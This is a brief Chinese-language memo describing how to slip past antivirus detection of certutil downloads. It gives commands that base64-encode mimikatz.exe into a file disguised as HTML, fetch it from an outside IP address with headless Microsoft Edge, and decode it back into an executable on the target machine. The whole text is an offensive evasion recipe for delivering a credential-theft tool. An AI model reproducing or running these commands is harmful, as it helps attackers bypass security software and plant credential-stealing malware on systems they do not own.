现在不混淆命令直接执行certutil命令直接就会被杀
使用certutil对文件进行base64编码
certutil -encode mimikatz.exe evil.b64.html
使用chrome\edge下载exe
"C:\Program Files (x86)\Microsoft\EdgeCore\110.0.1587.50\msedge.exe" --headless --enable-logging --disable-gpu --dump-dom http://205.185.114.68:8114/evil.b64.html > evil.b64.html
解码文件
certutil -decode evil.b64.html C:\Users\rkvir\Downloads\evil.exe
发的tcp的包